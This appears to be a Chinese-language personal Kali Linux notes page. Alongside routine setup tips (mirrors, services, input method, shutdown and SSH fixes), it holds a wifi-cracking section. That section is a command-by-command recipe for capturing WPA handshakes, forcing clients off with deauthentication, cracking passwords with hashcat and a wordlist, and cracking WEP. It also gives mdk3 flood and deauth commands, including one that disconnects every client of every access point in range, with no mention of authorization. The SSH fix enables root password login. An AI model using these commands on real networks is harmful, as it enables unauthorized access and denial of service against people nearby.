基础

系统安装

安装教程

安装后修改

  • 替换阿里源
  1. vim /etc/apt/sources.list
  2. #阿里云kali源
  3. deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  4. deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
  • 升级内核及软件
  1. apt-get clean
  2. apt-get update
  3. apt-get upgrade -y
  4. apt-get dist-upgrade -y
  5. reboot //重启
  6. apt-get install dkms kpartx printer-driver-postscript-hp
  7. apt-get install -y linux-headers-$(uname -r) //不起作用(可选)

服务操作

  1. # 查看状态
  2. /etc/init.d/Name status
  3. # 开启
  4. /etc/init.d/ssh start
  5. # 关闭
  6. /etc/init.d/ssh stop
  7. # 重启
  8. /etc/init.d/ssh restart
  9. # 设置服务自启动
  10. update-rc.d ssh enable
  11. # 关闭服务自启动
  12. update-rc.d ssh disable

google拼音

  1. apt-get install fcitx
  2. apt-get install fcitx-googlepinyin
  3. # 重启生效

目录转为英文

  1. mv 桌面 Desktop
  2. mv 文档 Documents
  3. mv 图片 Pictures
  4. mv 音乐 Music
  5. mv 下载 Downloads
  6. mv 视频 Video
  7. mv 公共 Public
  8. mv 模板 Template

破解wifi

  1. # 字典,非常重要,kali自带
  2. /usr/share/wordlists/rockyou.txt
  • 安装hashcat-utils
  • 转换cap为hccapx
  1. # make
  2. cd /usr/local
  3. git clone https://github.com/hashcat/hashcat-utils.git
  4. cd hashcat-utils/src
  5. sudo make
  6. # 加入环境变量
  7. vim ~/.bashrc
  8. # hashcat
  9. export PATH=$PATH:/usr/local/hashcat-utils/src
  10. source ~/.bashrc
  11. # 使用
  12. cap2hccapx.bin XXX.cap XXX.hccapx
  • 流程
  1. # 查看支持监控模式的无线网卡
  2. airmon-ng
  3. # 开启无线网卡的监控模式
  4. airmon-ng start wlan0
  5. # 查看wifi网络
  6. airodump-ng wlan0mon
  7. # 抓取握手包
  8. airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
  9. # -c指定频道号
  10. # –bssid指定路由器bssid
  11. # -w指定抓取的数据包保存位置
  12. # 强制连接到wifi的设备重新连接路由器
  13. ## 方式一:使用sdk3
  14. # 让频道为 11 所有计算机都掉线:
  15. sudo mdk3 wlan0mon d -c 11
  16. ## 方式二:指定设备
  17. aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
  18. # -0表示发起deauthentication攻击
  19. # -a指定无线路由器BSSID
  20. # -c指定强制断开的设备
  21. # 强制查看该wifi名称:aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
  22. # 如果成功
  23. airmon-ng stop wlan0mon
  24. # 使用GPU破解密码
  25. # 转换格式
  26. cap2hccapx.bin XXX.cap XXX.hccapx
  27. # 开始破解
  28. hashcat -m 2500 out.hccapx 字典文件
  29. # 对于wep密码的破解,单只要抓取到足够的Beacons和Data数据就可以破解,理想情况下是100000+。
  30. # 抓取握手包后加速收集,数据足够时crl+c停止即可
  31. aireplay-ng -1 0 -a C8:3A:35:30:3E:C8 wlan0mon
  32. aireplay-ng -3 -b C8:3A:35:30:3E:C8 wlan0mon
  33. # 关闭网卡监控模式并开始破解
  34. airmon-ng stop wlan0mon
  35. aircrack-ng ~/*.cap
  • mdk3
  1. # 验证洪水攻击 /Authentication Flood Attack
  2. # 指定路由器全部掉线,路由器有防DOS的功能的话,这个不好用
  3. sudo mdk3 wlan0mon a -a D4:::9F::
  4. # 取消身份验证攻击 / Deauth攻击
  5. # 让频道为 11 所有计算机都掉线:
  6. sudo mdk3 wlan0mon d -c 11
  7. # 在本地创建一个白名单的文本文件whiltelist.txt,存放ID
  8. sudo mdk3 wlan0mon d -c 11 -w "whitelist.txt"
  9. # Deauthentication/Disassociation Amok Mode
  10. # 可以将所有可见距离范围内AP的客户端均踢下线
  11. mdk3 wlan0mon d -s 10000
  12. # -w <filename> #白名单mac地址列表文件
  13. # -b <filename> #黑名单mac地址列表文件
  14. # -s <pps> #速率,这个模式下默认无限制
  15. # -c [chan,chan,chan,…] #信道,可以多填,如 2,4,5,1

软件

其他问题

关机慢

Linux关机或重启时提示A stop job is running for ..

  1. vim /etc/systemd/system.conf
  2. # 修改:
  3. DefaultTimeoutStartSec=10s
  4. DefaultTimeoutStopSec=10s
  5. # 刷新服务
  6. systemctl daemon-reload

ssh无法登陆

  • 被拒绝
  1. /etc/init.d/ssh start
  2. update-rc.d ssh enable
  • 权限不够
  1. vim /etc/ssh/sshd_config
  2. # 取消以下注释
  3. PasswordAuthentication yes
  4. PermitRootLogin yes
  5. PubkeyAuthentication yes
  6. AuthorizedKeysFile .ssh/authorized_keys

parallels下字体模糊

选中虚拟机->配置->硬件>视频 分辨率选择 最适合 Retina